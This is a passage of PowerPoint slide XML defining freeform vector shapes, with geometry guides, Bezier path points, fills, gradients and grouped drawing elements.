                      <a:gd name="T3" fmla="*/ 22 h 41"/>
                      <a:gd name="T4" fmla="*/ 50 w 66"/>
                      <a:gd name="T5" fmla="*/ 12 h 41"/>
                      <a:gd name="T6" fmla="*/ 13 w 66"/>
                      <a:gd name="T7" fmla="*/ 15 h 41"/>
                      <a:gd name="T8" fmla="*/ 9 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 36 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="36" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="52" y="37"/>
                          <a:pt x="66" y="25"/>
                          <a:pt x="56" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="50" y="21"/>
                          <a:pt x="53" y="15"/>
                          <a:pt x="50" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="10"/>
                          <a:pt x="13" y="0"/>
                          <a:pt x="13" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="21"/>
                          <a:pt x="19" y="25"/>
                          <a:pt x="9" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="33"/>
                          <a:pt x="20" y="41"/>
                          <a:pt x="36" y="39"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FFCC99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4" name="Freeform 1888"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3624" y="-1153"/>
                    <a:ext cx="189" cy="189"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 42 w 80"/>
                      <a:gd name="T1" fmla="*/ 1 h 80"/>
                      <a:gd name="T2" fmla="*/ 79 w 80"/>
                      <a:gd name="T3" fmla="*/ 42 h 80"/>
                      <a:gd name="T4" fmla="*/ 38 w 80"/>
                      <a:gd name="T5" fmla="*/ 79 h 80"/>
                      <a:gd name="T6" fmla="*/ 1 w 80"/>
                      <a:gd name="T7" fmla="*/ 38 h 80"/>
                      <a:gd name="T8" fmla="*/ 42 w 80"/>
                      <a:gd name="T9" fmla="*/ 1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0" h="80">
                        <a:moveTo>
                          <a:pt x="42" y="1"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="64" y="2"/>
                          <a:pt x="80" y="20"/>
                          <a:pt x="79" y="42"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="79" y="63"/>
                          <a:pt x="60" y="80"/>
                          <a:pt x="38" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="78"/>
                          <a:pt x="0" y="60"/>
                          <a:pt x="1" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="17"/>
                          <a:pt x="20" y="0"/>
                          <a:pt x="42" y="1"/>
                        </a:cubicBezTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FFCC99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5" name="Freeform 1889"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3624" y="-1153"/>
                    <a:ext cx="189" cy="189"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 42 w 80"/>
                      <a:gd name="T1" fmla="*/ 1 h 80"/>
                      <a:gd name="T2" fmla="*/ 79 w 80"/>
                      <a:gd name="T3" fmla="*/ 42 h 80"/>
                      <a:gd name="T4" fmla="*/ 38 w 80"/>
                      <a:gd name="T5" fmla="*/ 79 h 80"/>
                      <a:gd name="T6" fmla="*/ 1 w 80"/>
                      <a:gd name="T7" fmla="*/ 38 h 80"/>
                      <a:gd name="T8" fmla="*/ 42 w 80"/>
                      <a:gd name="T9" fmla="*/ 1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0" h="80">
                        <a:moveTo>
                          <a:pt x="42" y="1"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="64" y="2"/>
                          <a:pt x="80" y="20"/>
                          <a:pt x="79" y="42"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="79" y="63"/>
                          <a:pt x="60" y="80"/>
                          <a:pt x="38" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="78"/>
                          <a:pt x="0" y="60"/>
                          <a:pt x="1" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="17"/>
                          <a:pt x="20" y="0"/>
                          <a:pt x="42" y="1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6" name="Freeform 1890"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3610" y="-624"/>
                    <a:ext cx="376" cy="425"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 27 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 78 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 87 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 91 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 142 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 158 w 159"/>
                      <a:gd name="T13" fmla="*/ 54 h 180"/>
                      <a:gd name="T14" fmla="*/ 158 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 123 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 117 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 117 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 117 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 117 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 117 w 159"/>
                      <a:gd name="T27" fmla="*/ 65 h 180"/>
                      <a:gd name="T28" fmla="*/ 117 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 117 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 101 w 159"/>
                      <a:gd name="T33" fmla="*/ 40 h 180"/>
                      <a:gd name="T34" fmla="*/ 56 w 159"/>
                      <a:gd name="T35" fmla="*/ 29 h 180"/>
                      <a:gd name="T36" fmla="*/ 56 w 159"/>
                      <a:gd name="T37" fmla="*/ 29 h 180"/>
                      <a:gd name="T38" fmla="*/ 101 w 159"/>
                      <a:gd name="T39" fmla="*/ 40 h 180"/>
                      <a:gd name="T40" fmla="*/ 117 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 117 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 117 w 159"/>
                      <a:gd name="T45" fmla="*/ 71 h 180"/>
                      <a:gd name="T46" fmla="*/ 117 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 117 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 117 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 117 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 116 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 75 w 159"/>
                      <a:gd name="T57" fmla="*/ 156 h 180"/>
                      <a:gd name="T58" fmla="*/ 74 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 70 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 18 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 0 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 0 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 0 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="0" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="17"/>
                          <a:pt x="19" y="22"/>
                          <a:pt x="27" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="35" y="20"/>
                          <a:pt x="66" y="13"/>
                          <a:pt x="78" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="10"/>
                          <a:pt x="86" y="5"/>
                          <a:pt x="87" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="88" y="18"/>
                          <a:pt x="87" y="18"/>
                          <a:pt x="91" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="19"/>
                          <a:pt x="131" y="28"/>
                          <a:pt x="142" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="152" y="36"/>
                          <a:pt x="158" y="42"/>
                          <a:pt x="158" y="54"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="158" y="55"/>
                          <a:pt x="159" y="134"/>
                          <a:pt x="158" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="157" y="163"/>
                          <a:pt x="134" y="165"/>
                          <a:pt x="123" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="153"/>
                          <a:pt x="117" y="149"/>
                          <a:pt x="117" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="130"/>
                          <a:pt x="117" y="102"/>
                          <a:pt x="117" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="73"/>
                          <a:pt x="117" y="73"/>
                          <a:pt x="117" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="72"/>
                          <a:pt x="117" y="72"/>
                          <a:pt x="117" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="69"/>
                          <a:pt x="117" y="67"/>
                          <a:pt x="117" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="65"/>
                          <a:pt x="117" y="64"/>
                          <a:pt x="117" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="64"/>
                          <a:pt x="117" y="63"/>
                          <a:pt x="117" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="116" y="50"/>
                          <a:pt x="111" y="44"/>
                          <a:pt x="101" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="37"/>
                          <a:pt x="58" y="30"/>
                          <a:pt x="56" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="52" y="28"/>
                          <a:pt x="52" y="28"/>
                          <a:pt x="56" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="30"/>
                          <a:pt x="91" y="37"/>
                          <a:pt x="101" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="111" y="44"/>
                          <a:pt x="116" y="50"/>
                          <a:pt x="117" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="64"/>
                          <a:pt x="117" y="70"/>
                          <a:pt x="117" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="71"/>
                          <a:pt x="117" y="71"/>
                          <a:pt x="117" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="71"/>
                          <a:pt x="117" y="74"/>
                          <a:pt x="117" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="77"/>
                          <a:pt x="117" y="77"/>
                          <a:pt x="117" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="154"/>
                          <a:pt x="117" y="154"/>
                          <a:pt x="117" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="154"/>
                          <a:pt x="116" y="154"/>
                          <a:pt x="117" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="116" y="155"/>
                          <a:pt x="116" y="156"/>
                          <a:pt x="116" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="115" y="180"/>
                          <a:pt x="75" y="176"/>
                          <a:pt x="75" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="141"/>
                          <a:pt x="74" y="79"/>
                          <a:pt x="74" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="74"/>
                          <a:pt x="72" y="70"/>
                          <a:pt x="70" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="68"/>
                          <a:pt x="23" y="57"/>
                          <a:pt x="18" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="51"/>
                          <a:pt x="0" y="47"/>
                          <a:pt x="0" y="25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7"/>
                          <a:pt x="0" y="7"/>
                          <a:pt x="0" y="6"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:schemeClr val="hlink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" name="Freeform 1891"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3563" y="-709"/>
                    <a:ext cx="215" cy="130"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 16 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 55"/>
                      <a:gd name="T2" fmla="*/ 63 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 55"/>
                      <a:gd name="T4" fmla="*/ 51 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 55"/>
                      <a:gd name="T6" fmla="*/ 0 w 91"/>
                      <a:gd name="T7" fmla="*/ 33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1" h="55">
                        <a:moveTo>
                          <a:pt x="16" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="4"/>
                          <a:pt x="46" y="9"/>
                          <a:pt x="63" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="22"/>
                          <a:pt x="74" y="55"/>
                          <a:pt x="51" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="47" y="45"/>
                          <a:pt x="26" y="39"/>
                          <a:pt x="0" y="33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11" name="Freeform 1892"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3831" y="456"/>
                  <a:ext cx="82" cy="134"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 118 w 123"/>
                    <a:gd name="T1" fmla="*/ 204 h 204"/>
                    <a:gd name="T2" fmla="*/ 117 w 123"/>
                    <a:gd name="T3" fmla="*/ 204 h 204"/>
                    <a:gd name="T4" fmla="*/ 3 w 123"/>
                    <a:gd name="T5" fmla="*/ 173 h 204"/>
                    <a:gd name="T6" fmla="*/ 0 w 123"/>
                    <a:gd name="T7" fmla="*/ 169 h 204"/>
                    <a:gd name="T8" fmla="*/ 0 w 123"/>
                    <a:gd name="T9" fmla="*/ 5 h 204"/>
                    <a:gd name="T10" fmla="*/ 2 w 123"/>
                    <a:gd name="T11" fmla="*/ 2 h 204"/>
                    <a:gd name="T12" fmla="*/ 6 w 123"/>
                    <a:gd name="T13" fmla="*/ 1 h 204"/>
                    <a:gd name="T14" fmla="*/ 120 w 123"/>
                    <a:gd name="T15" fmla="*/ 31 h 204"/>
                    <a:gd name="T16" fmla="*/ 123 w 123"/>
                    <a:gd name="T17" fmla="*/ 36 h 204"/>
                    <a:gd name="T18" fmla="*/ 123 w 123"/>
                    <a:gd name="T19" fmla="*/ 199 h 204"/>
                    <a:gd name="T20" fmla="*/ 121 w 123"/>
                    <a:gd name="T21" fmla="*/ 203 h 204"/>
                    <a:gd name="T22" fmla="*/ 118 w 123"/>
                    <a:gd name="T23" fmla="*/ 204 h 204"/>
                    <a:gd name="T24" fmla="*/ 9 w 123"/>
                    <a:gd name="T25" fmla="*/ 165 h 204"/>
                    <a:gd name="T26" fmla="*/ 114 w 123"/>
                    <a:gd name="T27" fmla="*/ 193 h 204"/>
                    <a:gd name="T28" fmla="*/ 114 w 123"/>
                    <a:gd name="T29" fmla="*/ 39 h 204"/>
                    <a:gd name="T30" fmla="*/ 9 w 123"/>
                    <a:gd name="T31" fmla="*/ 12 h 204"/>
                    <a:gd name="T32" fmla="*/ 9 w 123"/>
                    <a:gd name="T33" fmla="*/ 165 h 2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23" h="204">
                      <a:moveTo>
                        <a:pt x="118" y="204"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="204"/>
                        <a:pt x="117" y="204"/>
                        <a:pt x="117" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="173"/>
                        <a:pt x="3" y="173"/>
                        <a:pt x="3" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="173"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="0" y="169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4"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="1"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="6" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="31"/>
                        <a:pt x="120" y="31"/>
                        <a:pt x="120" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="32"/>
                        <a:pt x="123" y="34"/>
                        <a:pt x="123" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="199"/>
                        <a:pt x="123" y="199"/>
                        <a:pt x="123" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="201"/>
                        <a:pt x="122" y="202"/>
                        <a:pt x="121" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="204"/>
                        <a:pt x="119" y="204"/>
                        <a:pt x="118" y="204"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="9" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="114" y="193"/>
                        <a:pt x="114" y="193"/>
                        <a:pt x="114" y="193"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="114" y="39"/>
                        <a:pt x="114" y="39"/>
                        <a:pt x="114" y="39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65"/>
                        <a:pt x="9" y="165"/>
                        <a:pt x="9" y="1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34" name="Group 133"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4591170" y="1486211"/>
              <a:ext cx="1627038" cy="571967"/>
              <a:chOff x="5141913" y="2433638"/>
              <a:chExt cx="2063750" cy="725488"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="135" name="Freeform 1312"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5141913" y="2603501"/>
                <a:ext cx="2063750" cy="555625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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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sp>
            <p:nvSpPr>
              <p:cNvPr id="136" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5346700" y="2660651"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FF66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ACACA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sp>
            <p:nvSpPr>
              <p:cNvPr id="137" name="Line 1739"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6948488" y="2744788"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="138" name="Group 1726"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6583363" y="2528888"/>
                <a:ext cx="457200" cy="268288"/>
                <a:chOff x="-1948" y="-2460"/>
                <a:chExt cx="1368" cy="801"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="182" name="Freeform 1727"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1662" y="-2460"/>
                  <a:ext cx="498" cy="622"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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83" name="Freeform 1728"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1599" y="-2398"/>
                  <a:ext cx="359" cy="493"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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chemeClr val="hlink"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="hlink">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:schemeClr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84" name="Freeform 1729"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1629" y="-2457"/>
                  <a:ext cx="479" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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85" name="Freeform 1730"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1209" y="-2344"/>
                  <a:ext cx="352" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
